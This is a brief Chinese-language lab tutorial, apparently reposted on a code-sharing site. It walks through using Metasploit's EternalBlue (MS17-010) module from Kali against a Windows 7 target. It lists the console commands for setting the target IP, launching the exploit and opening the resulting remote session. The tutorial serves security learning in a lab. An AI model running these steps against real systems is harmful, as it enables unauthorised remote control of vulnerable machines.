metasploit 下利用永恆之藍攻擊靶機win7


 

實驗環境:一台win7靶機,kali作為攻擊機

控制台下輸入msfconsole

search ms17-010

 

use exploit/windows/smb/ms17_010_eternalblue

 

接下來可以看一下受這個漏洞影響的操作系統

可以看出受影響的有兩個,分別是win7和server 2008 R2兩種操作系統(ps:這兩款靶機都可以自己搭建一下,我這里使用的是win7)

show options 看一下需要設置的參數

可以看出我們需要設置RHOST 和RPORT 已經下面兩個required為 yes的參數

 

 這里只需設定一下靶機的IP地址即可,其余的參數默認就好

 

exploit 進行攻擊(-z是為了在成功攻擊目標后暫時不使用控制會話進行交互),也可以直接exploit,直接返回靶機的控制台,簡單的按CTRL -Z命令將控制會話直接放到后台運行,我這里是為了更好地看一下sessions

sessions -l 查看所有的會話

 

sessions -i ID 啟用ID會話

 

接下來就直接進入到win7的控制台

然后就可以進行下一步的各種操作了

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM